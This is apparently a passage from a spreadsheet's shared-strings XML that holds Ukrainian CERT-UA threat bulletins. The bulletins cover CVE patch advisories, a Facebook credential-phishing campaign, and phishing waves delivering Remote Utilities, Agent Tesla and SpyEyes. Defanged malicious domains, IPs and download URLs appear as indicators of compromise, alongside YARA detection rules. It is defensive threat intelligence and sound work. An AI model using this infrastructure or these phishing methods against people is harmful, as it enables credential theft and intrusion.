fr7c[.]us   
i0t[.]us    
87yc[.]xyz </t>
  </si>
  <si>
    <t>Урядовою командою реагування на комп’ютерні надзвичайні події України CERT-UA отримано інформацію щодо масового розповсюдження підозрілих посилань, наприклад hxxps://rwi2v[.]eu/Q2llT5wJ. За результатами дослідження повідомляємо таке.
У разі відкриття згаданого посилання, браузер мобільного пристрою здійснить завантаження HTML-сторінки. Ця сторінка містить JavaScript-код, виконання якого призведе до відкриття браузером іншої URL-адреси (домен: 87yc[.]xyz), що, у свою чергу, призведе до завантаження і виконання додаткового JavaScript-коду. Під час аналізу було підтверджено факт завантаження коду, який імітував сторінку авторизації Facebook та здійснював ексфільтрацію введених автентифікаційних даних.
У разі, якщо ширина екрану більше 800 пікселів (вірогідно, фільтрація не мобільних пристроїв), буде здійснено перенаправлення на головну сторінку веб-сайту hxxps://www.youtube[.]com/. 
Приклад вихідного коду HTML-сторінок наведено на графічних зображеннях, що додаються.
Зауважимо, що доменне ім'я rwi2v[.]eu створене 2022-02-04 та асоційоване з email-адресою theone2716@gmail[.]com, з якою, у свою чергу, асоційовано ще 7 схожих доменних імен, створених у листопаді-грудні 2021 року.
Подібна активність здійснюється невстановленою групою осіб, що іменують себе "TeamLucernaRD", не пізніше ніж з листопада 2021 року з метою викрадення автентифікаційних даних користувачів Facebook. Відношення даної активності до атаки на інформаційні ресурси 15.02.2022 не підтверджено.￼
Закликаємо не переходити за підозрілими посиланнями та використовувати мультифакторну автентифікацію.
Індикатори компрометації:
hxxps://87yc[.]xyz/?api=1&amp;lan=fbnewold&amp;ht=1&amp;c=geraldking13&amp;user=geraldking1321
https://87yc[.]xyz/save.php?api=1&amp;lan=fbnewold&amp;ht=1&amp;c=geraldking13&amp;user=geraldking1321
rwi2v[.]eu  2022-02-04
v0k[.]us    2021-11-19
t7s[.]us    2021-11-19
r0m[.]us    2021-11-19
j0r[.]us    2021-11-19
f1r[.]us    2021-11-19
fr7c[.]us   2021-12-11
i0t[.]us    2021-12-11
87yc[.]xyz  2022-02-01</t>
  </si>
  <si>
    <t>curl users</t>
  </si>
  <si>
    <t xml:space="preserve">Нагадуємо про необхідність своєчасного оновлення програмного забезпечення.
Корпорація Майкрософт випустила щомісячне оновлення безпеки, в якому виправлено 6 вразливостей нульового дня: 
- CVE-2021-22947: віддалене виконання коду з використанням curl
- CVE-2021-36976: віддалене виконання коду з використанням Libarchive 
- CVE-2022-21919: підвищення привілеїв через службу профілів користувачів Windows
- CVE-2022-21836: підробка сертифікатів Windows
- CVE-2022-21839: відмова в обслуговуванні в дискреційних списках контролю доступу Windows Event Tracing 
- CVE-2022-21874: віддалене виконання коду з використанням Windows Security Center API.
Всього оновлення  усуває 97 вразливостей:
- 41 вразливість підвищення привілеїв
- 9 вразливостей обходу функцій безпеки
- 29 вразливостей віддаленого виконання коду
- 6 вразливостей розкриття інформації
- 9 вразливостей відмови в обслуговуванні
- 3 вразливості спуфінгу. </t>
  </si>
  <si>
    <t>CVE-2021-22947</t>
  </si>
  <si>
    <t>CWE-345</t>
  </si>
  <si>
    <t>libarchive users</t>
  </si>
  <si>
    <t>CVE-2021-36976</t>
  </si>
  <si>
    <t>CWE-416</t>
  </si>
  <si>
    <t>Gained administrator access</t>
  </si>
  <si>
    <t>CVE-2022-21919</t>
  </si>
  <si>
    <t>CWE-269</t>
  </si>
  <si>
    <t>6,9</t>
  </si>
  <si>
    <t>Forgery of certificates</t>
  </si>
  <si>
    <t xml:space="preserve">Нагадуємо про необхідність своєчасного оновлення програмного забезпечення.
Корпорація Майкрософт випустила щомісячне оновлення безпеки, в якому виправлено 6 вразливостей нульового дня: 
- CVE-2021-22947: віддалене виконання коду з використанням curl
- CVE-2021-36976: віддалене виконання коду з використанням Libarchive 
- CVE-2022-21919: підвищення привілеїв через службу профілів користувачів Windows
- CVE-2022-21836: підробка сертифікатів Windows
- CVE-2022-21839: відмова в обслуговуванні в дискреційних списках контролю доступу Windows Event Tracing 
- CVE-2022-21874: віддалене виконання коду з використанням Windows Security Center API.
Всього оновлення  усуває 97 вразливостей:
- 41 вразливість підвищення привілеїв
- 9 вразливостей обходу функцій безпеки
- 29 вразливостей віддаленого виконання коду
- 6 вразливостей розкриття інформації
- 9 вразливостей відмови в обслуговуванні
- 3 вразливості спуфінгу. </t>
  </si>
  <si>
    <t>CVE-2022-21836</t>
  </si>
  <si>
    <t>CWE-295</t>
  </si>
  <si>
    <t>7,2</t>
  </si>
  <si>
    <t>CVE-2022-21839</t>
  </si>
  <si>
    <t>CWE-400</t>
  </si>
  <si>
    <t>2,1</t>
  </si>
  <si>
    <t>CVE-2022-21874</t>
  </si>
  <si>
    <t>Zoho ManageEngine ServiceDesk Plus users</t>
  </si>
  <si>
    <t>RestAPI URLs, ImportTechnicians, Struts configuration</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">Новини та рекомендації кібербезпеки.
CISA опублікувала рекомендації щодо Автоматизованих систем керування (ICSA), пов’язаних з публічним звітом, де детально описані вразливості, виявлені в кількох реалізаціях служби розповсюдження даних (DDS) групи управління об'єктами (OMG) з відкритим вихідним кодом та власністю. Рекомендуємо переглянути та встановити необхідні оновлення:
https://us-cert.cisa.gov/ics/advisories/icsa-21-315-02 
CISA і Федеральне бюро розслідувань (ФБР) опублікували спільну рекомендацію з кібербезпеки, яка ідентифікує активне використання вразливості — CVE-2021-44077 — у Zoho ManageEngine ServiceDesk Plus. Ознайомитись можна за посиланням:
https://us-cert.cisa.gov/ncas/alerts/aa21-336a
Також нагадуємо про необхідність своєчасного оновлення програмного забезпечення.
VMware випустила оновлення безпеки для усунення численних вразливостей у vCenter Server і Cloud Foundation. Рекомендуємо переглянути та встановити необхідні оновлення:
https://www.vmware.com/sec.../advisories/VMSA-2021-0027.html
Palo Alto Networks випустили оновлення безпеки для усунення вразливостей, що вражають конфігурації брандмауера PAN-OS з інтерфейсами порталу та шлюзу GlobalProtect (8.1.16 та старіших версій). Рекомендуємо переглянути та встановити необхідні оновлення:
https://security.paloaltonetworks.com/CVE-2021-3064 
Компанія Google випустила оновлення Chrome 96 для iOS та Android. Ознайомитись можна за посиланнями:
- Chrome 96 (96.0.4664.45) для Android:
https://chromereleases.googleblog.com/.../chrome-for... 
- Chrome 96 (96.0.4664.53) для iOS:
https://chromereleases.googleblog.com/.../chrome-for-ios... 
Mozilla випустила оновлення безпеки для усунення вразливості в службах безпеки мережі (NSS). Рекомендуємо переглянути та встановити необхідні оновлення:
https://www.mozilla.org/.../security/advisories/mfsa2021-51/ 
Drupal випустив оновлення безпеки для усунення вразливостей, які можуть вплинути на версії 8.9, 9.1 і 9.2. Рекомендуємо переглянути та встановити необхідні оновлення:
</t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://www.drupal.org/sa-core-2021-011</t>
    </r>
  </si>
  <si>
    <t>CVE-2021-44077</t>
  </si>
  <si>
    <t>CWE-287</t>
  </si>
  <si>
    <t>Log4Shell users</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">Критична вразливість Log4Shell (RCE).
Вразливість Java бібліотеки log4j CVE-2021-44228 дозволяє зловмисникам здійснити віддалене виконання коду та повністю скомпрометувати вразливу машину. 
В мережі вже опубліковано експлойт вразливості, і наразі зловмисники активно шукають в мережі вразливі хости з метою подальшої їх компрометації. Зараз вразливість експлуатується з метою завантаження на вразливі сервери криптомайнерів. 
Вразливість виправлено у версії 2.15.0.
Рекомендуємо негайно оновити log4j до останньої версії.
Останню версію Log4J можна знайти за посиланням: 
</t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://logging.apache.org/log4j/2.x/download.html</t>
    </r>
  </si>
  <si>
    <t>CVE-2021-44228</t>
  </si>
  <si>
    <t>CWE-502</t>
  </si>
  <si>
    <t>У версії 2.15.0 Log4J було виявлено вразливість CVE-2021-45046, яка, у разі успішного використання, дає можливість зловмиснику ініціювати DoS-атаку на ресурс жертви. Цю вразливість виправлено у версії 2.16.0.</t>
  </si>
  <si>
    <t>CVE-2021-45046</t>
  </si>
  <si>
    <t>5,1</t>
  </si>
  <si>
    <t xml:space="preserve">Версія 2.16.0 має вразливість CVE-2021-45105, що дозволяє реалізувати DoS-атаку. Її виправлено у версії 2.17.0. </t>
  </si>
  <si>
    <t>CVE-2021-45105</t>
  </si>
  <si>
    <t>CWE-20</t>
  </si>
  <si>
    <t>InstallerFileTakeOver</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">Звертаємо Вашу увагу на вразливість (CVE-2021-41379), що присутня на всіх версіях Microsoft Windows, яка дозволяє зловмиснику підвищити права доступу. Код експлойту даної вразливості є у відкритому доступі під назвою InstallerFileTakeOver. Вже помічені зразки шкідливого програмного забезпечення, які використовують цю вразливість. В Microsoft, поки що відсутнє оновлення безпеки, яке усуває цю вразливість.
Для захисту та виявлення спроб експлуатації зазначеної вразливості радимо скористатися правилами SNORT, запропонованими Talos: https://snort.org/advisories/talos-rules-2021-11-23.
Також, радимо включити автоматичні оновлення Windows та оновити свої ОС одразу, коли випустять оновлення безпеки, яке усуває зазначену вразливість. 
Інформація щодо вразливості на офіційному сайті Microsoft: https://msrc.microsoft.com/.../vulnerability/CVE-2021-41379
ID події в MISP CERT-UA:
</t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://misp.cert.gov.ua/events/view/1613</t>
    </r>
  </si>
  <si>
    <t>CVE-2021-41379</t>
  </si>
  <si>
    <t>4,6</t>
  </si>
  <si>
    <t>Apple users</t>
  </si>
  <si>
    <t xml:space="preserve">Нагадуємо про необхідність своєчасного оновлення програмного забезпечення.
Apple випустила оновлення безпеки для усунення вразливостей у кількох продуктах. Apple зазначає, що їм відомо про звіт, у якому стверджується, що CVE-2022-22675, можливо, активно використовувався.  CVE-2022-22675 впливає на watchOS, tvOS і macOS Big Sur. </t>
  </si>
  <si>
    <t>CVE-2022-22675</t>
  </si>
  <si>
    <t>F5 BIG-IP users</t>
  </si>
  <si>
    <t xml:space="preserve">CISA та Багатодержавний центр обміну та аналізу інформації (MS-ISAC) випустили спільну консультацію щодо загроз кібербезпеки, які використовують F5 BIG-IP CVE-2022-1388 у відповідь на активну експлуатацію CVE-2022-1388, яка впливає на пристрої BIG-IP мережі F5. Ознайомитись можна за посиланням:
http://www.cisa.gov/uscert/ncas/alerts/aa22-138a </t>
  </si>
  <si>
    <t>CVE-2022-1388</t>
  </si>
  <si>
    <t>CWE-306</t>
  </si>
  <si>
    <t>Samba users</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</si>
  <si>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</si>
  <si>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CVE-2016-2124</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</si>
  <si>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</si>
  <si>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CVE-2020-25717</t>
  </si>
  <si>
    <t>8,5</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</si>
  <si>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</si>
  <si>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CVE-2020-25718</t>
  </si>
  <si>
    <t>CWE-732</t>
  </si>
  <si>
    <t>6,5</t>
  </si>
  <si>
    <t>Domain compromise</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</si>
  <si>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</si>
  <si>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CVE-2020-25719</t>
  </si>
  <si>
    <t>9,0</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</si>
  <si>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</si>
  <si>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CVE-2020-25721</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</si>
  <si>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</si>
  <si>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CVE-2020-25722</t>
  </si>
  <si>
    <t>CWE-863</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</si>
  <si>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</si>
  <si>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CVE-2021-3738</t>
  </si>
  <si>
    <t>very large DCE/RPC request</t>
  </si>
  <si>
    <t>Bypass a restriction</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</si>
  <si>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</si>
  <si>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CVE-2021-23192</t>
  </si>
  <si>
    <t>Palo Alto Networks users</t>
  </si>
  <si>
    <t>RCE, Gained administrator access, System failure</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">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t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://security.paloaltonetworks.com/CVE-2021-3064...</t>
    </r>
  </si>
  <si>
    <t>CVE-2021-3064</t>
  </si>
  <si>
    <t>CWE-787</t>
  </si>
  <si>
    <t>Apache users</t>
  </si>
  <si>
    <t xml:space="preserve">Нагадуємо про необхідність своєчасного оновлення програмного забезпечення.
Apache Software Foundation випустили Apache HTTP Server version 2.4.51 для усунення вразливості CVE-2021-41773, CVE-2021-42013 у Apache HTTP Server 2.4.49 та 2.4.50. Так як виправлення CVE-2021-41773 в версії 2.4.50 були не достатніми, адже можна було успішно здійснити path traversal атаку, якщо файли не захищені стандартним налаштуванням  "require all denied". Рекомендуємо переглянути та встановити необхідні оновлення:
https://httpd.apache.org/security/vulnerabilities_24.html... </t>
  </si>
  <si>
    <t>CVE-2021-41773</t>
  </si>
  <si>
    <t>CWE-22</t>
  </si>
  <si>
    <t>CVE-2021-42013</t>
  </si>
  <si>
    <t>Terminated process</t>
  </si>
  <si>
    <t>Internet Systems Consortium (ISC) випустили оновлення безпеки для усунення вразливості CVE-2021-25218 – ISC Berkeley Internet Name Domain (BIND). Рекомендуємо переглянути та застосувати необхідні оновлення</t>
  </si>
  <si>
    <t>CVE-2021-25218</t>
  </si>
  <si>
    <t>Підтвердження особи; ua</t>
  </si>
  <si>
    <t>naa.ptp@glavdostavka.ru
hХХps://mailverification.bitrix24[.]site/</t>
  </si>
  <si>
    <t>CERT-UA отримано інформацію про здійснення фішингової розсилки з метою збору облікових даних електронних поштових адрес. Листи відсилаються начебто від імені Національної поліції але насправді електронна пошта з якої відправляються фішингові листи naa.ptp@glavdostavka.ru. Тема фішингових листів "Підтвердьте свій поштовий обліковий запис". Листи містять посилання на фішинговий сайт  hХХps://mailverification.bitrix24[.]site/, який містить форму для введення даних електронних поштових адрес.</t>
  </si>
  <si>
    <t>RCE, Memory corruption</t>
  </si>
  <si>
    <t xml:space="preserve">Останнє усуває вразливість CVE-2021-30807 у macOS, iOS та iPadOS, що надає додатку можливість виконати довільний код з привілеями ядра. </t>
  </si>
  <si>
    <t xml:space="preserve">CVE-2021-30807 </t>
  </si>
  <si>
    <t>PrintNightmare</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">Корпорація Майкрософт випустила оновлення безпеки для усунення вразливості віддаленого виконання коду (RCE) - відомої як PrintNightmare (CVE-2021-34527) - у службі Windows Print spooler.
Оновлення містять усі попередні виправлення, а також захист для CVE-2021-1675. Оновлення не включають Windows 10 версії 1607, Windows Server 2012 або Windows Server 2016 - Microsoft заявляють, що оновлення цих версій очікуються. 
Відповідно до CERT/CC, оновлення Microsoft для CVE-2021-34527, стосується лише способів віддаленого виконання коду (RCE через SMB та RPC) PrintNightmare, а не способу Local Privilege Escalation (LPE)». Перегляньте примітку про вразливість CERT/CC # 383432 щодо оновлення для LPE.
Рекомендуємо користувачам та адміністраторам переглянути оновлення безпеки Microsoft, а також примітку про вразливість CERT/CC та застосувати необхідні оновлення:
https://msrc.microsoft.com/.../vulnerability/CVE-2021-34527
</t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://www.kb.cert.org/vuls/id/383432</t>
    </r>
  </si>
  <si>
    <t>CVE-2021-34527</t>
  </si>
  <si>
    <t>Gained administrator access, RCE</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">Корпорація Майкрософт випустила оновлення безпеки для усунення вразливості віддаленого виконання коду (RCE) - відомої як PrintNightmare (CVE-2021-34527) - у службі Windows Print spooler.
Оновлення містять усі попередні виправлення, а також захист для CVE-2021-1675. Оновлення не включають Windows 10 версії 1607, Windows Server 2012 або Windows Server 2016 - Microsoft заявляють, що оновлення цих версій очікуються. 
Відповідно до CERT/CC, оновлення Microsoft для CVE-2021-34527, стосується лише способів віддаленого виконання коду (RCE через SMB та RPC) PrintNightmare, а не способу Local Privilege Escalation (LPE)». Перегляньте примітку про вразливість CERT/CC # 383432 щодо оновлення для LPE.
Рекомендуємо користувачам та адміністраторам переглянути оновлення безпеки Microsoft, а також примітку про вразливість CERT/CC та застосувати необхідні оновлення:
https://msrc.microsoft.com/.../vulnerability/CVE-2021-34527
</t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://www.kb.cert.org/vuls/id/383432</t>
    </r>
  </si>
  <si>
    <t>CVE-2021-1675</t>
  </si>
  <si>
    <t>Mircosoft випустили ряд оновлень безпеки, для усунення майже 50 вразливостей, серед яких 5 було позначено як «критичні». Серед них вразливості, що були виявлені в реальних атаках (0-day).
Особливу увагу слід звернути на наступні вразливості та пов’язані з ними оновлення безпеки. 
CVE-2021-31199: вразливість підвищення привілеїв у Microsoft Enhanced Cryptographic Provider, що наявна в усіх версіях Windows та Windows Server.
CVE-2021-31955: помилка розкриття інформації в ядрі Windows Kernel. Дана вразливість вражає останні версії Windows 10 та Windows Server 20H2, 2004, 1909.
CVE-2021-31956: вразливість підвищення привілеїв у Windows NTFS. Вражає останні версії Windows 10.
CVE-2021-33739: ще одна вразливість підвищення привілеїв у Desktop Window Manager. Вразливість торкається Windows 10 та Windows Server 2019. 
 CVE-2021-33742: вразливість віддаленого виконання коду у Windows HTML. Дана вразливість присутня в усіх Windows ОС та Windows Server.
CVE-2021-31962: вразливість обходу функцій безпеки у Kerberos AppContainer. Наявна в усіх версіях Windows та Windows Server.
CVE-2021-26414: вразливість обходу функцій безпеки у Windows DCOM. Дана вразливість присутня в усіх версіях Windows та Windows Server. Згідно з індексом експлуатації у атак з використанням даної вразливості низький рівень ймовірності.
CVE-2021-31959: вразливість віддаленого виконання коду у вбудованих браузерах у компонентах Scripting Engine. Дана вразливість присутня в усіх версіях Windows та Windows Server.
CVE-2021-31939: ще одна вразливість віддаленого виконання коду у додатках Microsoft Excel. Дана вразливість присутня в Microsoft Office 2016-2019, Microsoft Excel 2013–2016, додатки Microsoft 365 для Підприємств, Microsoft Office Online Server, Microsoft Office Web Apps Server 2013. Згідно з індексом експлуатації у атак з використанням даної вразливості низький рівень ймовірності.
CVE-2021-31941: вразливість віддаленого виконання коду у додатках Microsoft Office Graphics. Наявна в Microsoft Office 2013, 2016, 2019, додатки Microsoft 365 для Підприємств, Microsoft Office 2019 для Mac. Згідно з індексом експлуатації у атак з використанням даної вразливості низький рівень ймовірності.
CVE-2021-31963:  вразливість віддаленого виконання коду у додатках Microsoft SharePoint Server. Дана вразливість присутня в SharePoint Server 2019, 2016, 2013. Згідно з індексом експлуатації у атак з використанням даної вразливості низький рівень ймовірності.
CVE-2021-31201: вразливість підвищення привілеїв у Microsoft Enhanced Cryptographic Provider. Вона наявна в Windows 10, 8, 7 та Windows Server 2019, 2012, 2008. Як і CVE-2021-31199, дана вразливість пов’язана з нещодавніми оновленнями безпеки компанії Adobe для вразливості CVE-2021-28550, що наявна в  Adobe Acrobat та Reader та активно використовується.
Директор з інформаційної безпеки та досліджень компанії Automox - Крістофер Хасс, зазначив, що дані вразливості використовувалися шляхом розсиланням спеціально створених PDF файлів, що часто кріпляться до фішингових листів. Після їх відкриття на комп’ютері жертви зловмисник може отримати можливість виконати довільний код. 
Рекомендується встановити відповідні оновлення, для попередження використання даних вразливостей зловмисниками.</t>
  </si>
  <si>
    <t>CVE-2021-31199</t>
  </si>
  <si>
    <t>CVE-2021-31955</t>
  </si>
  <si>
    <t>CWE-200</t>
  </si>
  <si>
    <t>CVE-2021-31956</t>
  </si>
  <si>
    <t>CVE-2021-33739</t>
  </si>
  <si>
    <t>CVE-2021-33742</t>
  </si>
  <si>
    <t>CVE-2021-31962</t>
  </si>
  <si>
    <t>CVE-2021-26414</t>
  </si>
  <si>
    <t>Memory corruption</t>
  </si>
  <si>
    <t>CVE-2021-31959</t>
  </si>
  <si>
    <t>CVE-2021-31939</t>
  </si>
  <si>
    <t>CVE-2021-31941</t>
  </si>
  <si>
    <t>CVE-2021-31963</t>
  </si>
  <si>
    <t>CVE-2021-31201</t>
  </si>
  <si>
    <t>Adobe users</t>
  </si>
  <si>
    <t>CVE-2021-28550</t>
  </si>
  <si>
    <t>Національна Поліція України; ua</t>
  </si>
  <si>
    <t>Remote Utilities</t>
  </si>
  <si>
    <t>txt, rar, exe</t>
  </si>
  <si>
    <t>185.231.68[.]230
rmssrv[.]ru
hXXps://www.remoteutilities[.]com
hXXps://rmansys[.]ru</t>
  </si>
  <si>
    <t>C:\Program Files (x86)\Remote Utilities - Host\rutserv.exe
C:\Program Files (x86)\Remote Utilities - Host\rfusclient.exe</t>
  </si>
  <si>
    <t>rule RMS_winspooldrv_dllhijack {
meta:
    description = "winspool.drv malicious file used in RMS RAT"
    hash = "5a6efa2921d3174bb9808fa3a3400d13"  
    hash = "bb188e1e92e2be8a1ff009fe22f58f7f"  
    version = "1.1"    
strings:
    $a1= "Password.rcfg" fullword
    $a2 = "Password.rcfg" wide fullword
    $b1= "winspool.drv" fullword
    $b2= "killrms" wide fullword
condition:
        uint16(0) == 0x5A4D
    and any of ($a*)
    and all of ($b*)
    and filesize &lt; 100000 
}
rule TeamViewer_msimg32_dllhijack {
meta:
    description = "msimg32.dll malicious file used in TeamViewer"
    hash = "16b4ebfdf74db8f730f2fb4d03e86d27"
    hash = "8c4e9016b9b4db809dd312f971a275b1"
    version = "1.1"    
strings:
    $a1="msimg32.dll" fullword
condition:
        uint16(0) == 0x5A4D
    and any of ($a*)
    and pe.exports("SvcMain")
    and pe.number_of_exports &gt;6
    and filesize &gt; 50000 
    and filesize &lt; 200000 
}</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">Відновилися масові розсилки на електронні поштові адреси державних органів України фішингових листів зі вкладеним бекдором Remote Utilities або посиланнями на його завантаження. 
Листи направляються з різних поштових адрес, використовуючи спуфінг. Містять запит  начебто від Національної Поліції України  щодо надання відомостей та спонукають відкрити додаток, який прикріплено до листа.
Архів містить програмне забезпечення Remote Utilities (hXXps://www.remoteutilities[.]com або hXXps://rmansys[.]ru). 
Зазначена кібератака та інструменти, які в ній використовуються, подібні до кібератак, які відбувались 13.03.2021, 09.03.2021, 23.03.2021, 19.01.2021 і описані на сайті CERT-UA:
</t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://cert.gov.ua/article/10011</t>
    </r>
  </si>
  <si>
    <t>Адміністрація Держспецзв’язку; ua</t>
  </si>
  <si>
    <t>txt, rar, exe, msi</t>
  </si>
  <si>
    <t>176.9.145[.]100
hXXps://www.remoteutilities[.]com
hXXps://rmansys[.]ru</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">Відновилися масові розсилки на електронні поштові адреси державних органів України фішингових листів зі вкладеним бекдором Remote Utilities або посиланнями на його завантаження. 
Листи направляються з різних поштових адрес, використовуючи спуфінг. Містять запит  начебто від Національної Поліції України  щодо надання відомостей та спонукають відкрити додаток, який прикріплено до листа.
Архів містить програмне забезпечення Remote Utilities (hXXps://www.remoteutilities[.]com або hXXps://rmansys[.]ru). 
Зазначена кібератака та інструменти, які в ній використовуються, подібні до кібератак, які відбувались 13.03.2021, 09.03.2021, 23.03.2021, 19.01.2021 і описані на сайті CERT-UA:
</t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://cert.gov.ua/article/10011</t>
    </r>
  </si>
  <si>
    <t>Нової пошти; ua</t>
  </si>
  <si>
    <t>Agent Tesla</t>
  </si>
  <si>
    <t>tgz, tar, exe</t>
  </si>
  <si>
    <t>Malware distribution, Phishing,Account compromise, C&amp;C</t>
  </si>
  <si>
    <t>"02.02", "03.03", "05.01", "02.03"</t>
  </si>
  <si>
    <t>Stolen personal data, Screenshot, Gained account access</t>
  </si>
  <si>
    <t>212.227.15[.]142</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">Продовжуються масові розсилки на електронні поштові адреси державних органів України фішингових листів зі вкладеним шкідливим програмним забезпеченням або посиланнями на його завантаження.
Листи містять інформацію начебто від Нової пошти, щодо відправлення вантажу та спонукають перейти за посиланням для перегляду деталей відправлення.
За посиланням знаходиться архів, що містить шкідливе програмне забезпечення Agent Tesla.
Ознайомитись з описом відповідного сімейства ШПЗ можливо за посиланням: </t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://cert.gov.ua/article/3028</t>
    </r>
  </si>
  <si>
    <t>ООС; ua</t>
  </si>
  <si>
    <t>SpyEyes</t>
  </si>
  <si>
    <t>exe, doc</t>
  </si>
  <si>
    <t>Malware distribution, Phishing, C&amp;C</t>
  </si>
  <si>
    <t>"02.02", "03.03", "02.03"</t>
  </si>
  <si>
    <t>Stolen personal data, Memory corruption</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">hXXp://31.42.185[.]63:8080/upld/D6BDA66A
hXXp://name1d[.]site/index333.txt
hXXp://gosloto[.]site/doc221/form_request.doc
195.128.123[.]215 
185.232.170[.]29 
51.254.63[.]225
31.42.185[.]63
</t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>mil.gov.ua</t>
    </r>
  </si>
  <si>
    <t>rule win_spyeye_auto {
    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2022-04-08"
        version = "1"
        description = "Detects win.spyeye."
        info = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.6.0"
        signator_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyeye"
        malpedia_rule_date = "20220405"
        malpedia_hash = "ecd38294bd47d5589be5cd5490dc8bb4804afc2a"
        malpedia_version = "20220411"
        malpedia_license = "CC BY-SA 4.0"
        malpedia_sharing = "TLP:WHITE"
    /* DISCLAIMER
     * The strings used in this rule have been automatically selected from the
     * disassembly of memory dumps and unpacked files, using YARA-Signator.
     * The code and documentation is published here:
     * https://github.com/fxb-cocacoding/yara-signator
     * As Malpedia is used as data source, please note that for a given
     * number of families, only single samples are documented.
     * This likely impacts the degree of generalization these rules will offer.
     * Take the described generation method also into consideration when you
     * apply the rules in your use cases and assign them confidence levels.
     */
    strings:
        $sequence_0 = { 81fbffffff7f 7509 56 57 e8???????? 8bd8 3bde }
            // n = 7, score = 700
            //   81fbffffff7f         | cmp                 ebx, 0x7fffffff
            //   7509                 | jne                 0xb
            //   56                   | push                esi
            //   57                   | push                edi
            //   e8????????           |                     
            //   8bd8                 | mov                 ebx, eax
            //   3bde                 | cmp                 ebx, esi
        $sequence_1 = { ff7508 33db 897df8 e8???????? }
            // n = 4, score = 700
            //   ff7508               | push                dword ptr [ebp + 8]
            //   33db                 | xor                 ebx, ebx
            //   897df8               | mov                 dword ptr [ebp - 8], edi
            //   e8????????           |                     
        $sequence_2 = { 7426 56 8965fc ff7514 ff7510 }
            // n = 5, score = 700
            //   7426                 | je                  0x28
            //   56                   | push                esi
            //   8965fc               | mov                 dword ptr [ebp - 4], esp
            //   ff7514               | push                dword ptr [ebp + 0x14]
            //   ff7510               | push                dword ptr [ebp + 0x10]
        $sequence_3 = { 8b65fc c9 c21c00 55 8bec 51 }
            // n = 6, score = 700
            //   8b65fc               | mov                 esp, dword ptr [ebp - 4]
            //   c9                   | leave               
            //   c21c00               | ret                 0x1c
            //   55                   | push                ebp
            //   8bec                 | mov                 ebp, esp
            //   51                   | push                ecx
        $sequence_4 = { 6889000000 ff7508 33db 897df8 }
            // n = 4, score = 700
            //   6889000000           | push                0x89
            //   ff7508               | push                dword ptr [ebp + 8]
            //   33db                 | xor                 ebx, ebx
            //   897df8               | mov                 dword ptr [ebp - 8], edi
        $sequence_5 = { e8???????? 85c0 7454 57 56 6a03 57 }
            // n = 7, score = 700
            //   e8????????           |                     
            //   85c0                 | test                eax, eax
            //   7454                 | je                  0x56
            //   57                   | push                edi
            //   56                   | push                esi
            //   6a03                 | push                3
            //   57                   | push                edi
        $sequence_6 = { c9 c21000 55 8bec 51 6871c517ae }
            // n = 6, score = 700
            //   c9                   | leave               
            //   c21000               | ret                 0x10
            //   55                   | push                ebp
            //   8bec                 | mov                 ebp, esp
            //   51                   | push                ecx
            //   6871c517ae           | push                0xae17c571
        $sequence_7 = { 56 6880000000 6a04 56 6a07 6800000040 57 }
            // n = 7, score = 700
            //   56                   | push                esi
            //   6880000000           | push                0x80
            //   6a04                 | push                4
            //   56                   | push                esi
            //   6a07                 | push                7
            //   6800000040           | push                0x40000000
            //   57                   | push                edi
        $sequence_8 = { 8d45e0 50 53 e8???????? 85c0 7407 c745f801000000 }
            // n = 7, score = 700
            //   8d45e0               | lea                 eax, dword ptr [ebp - 0x20]
            //   50                   | push                eax
            //   53                   | push                ebx
            //   e8????????           |                     
            //   85c0                 | test                eax, eax
            //   7407                 | je                  9
            //   c745f801000000       | mov                 dword ptr [ebp - 8], 1
        $sequence_9 = { 8965fc ff7510 ff750c ff7508 }
            // n = 4, score = 700
            //   8965fc               | mov                 dword ptr [ebp - 4], esp
            //   ff7510               | push                dword ptr [ebp + 0x10]
            //   ff750c               | push                dword ptr [ebp + 0xc]
            //   ff7508               | push                dword ptr [ebp + 8]
    condition:
        7 of them and filesize &lt; 741376
}</t>
  </si>
  <si>
    <t>Продовжуються масові розсилки на електронні поштові адреси державних органів України фішингових листів зі вкладеним шкідливим програмним забезпеченням або посиланнями на його завантаження. 
Тематика листів відрізняється, проте основними темами є: НАТО, COVID-19, Bitcoin та ООС.
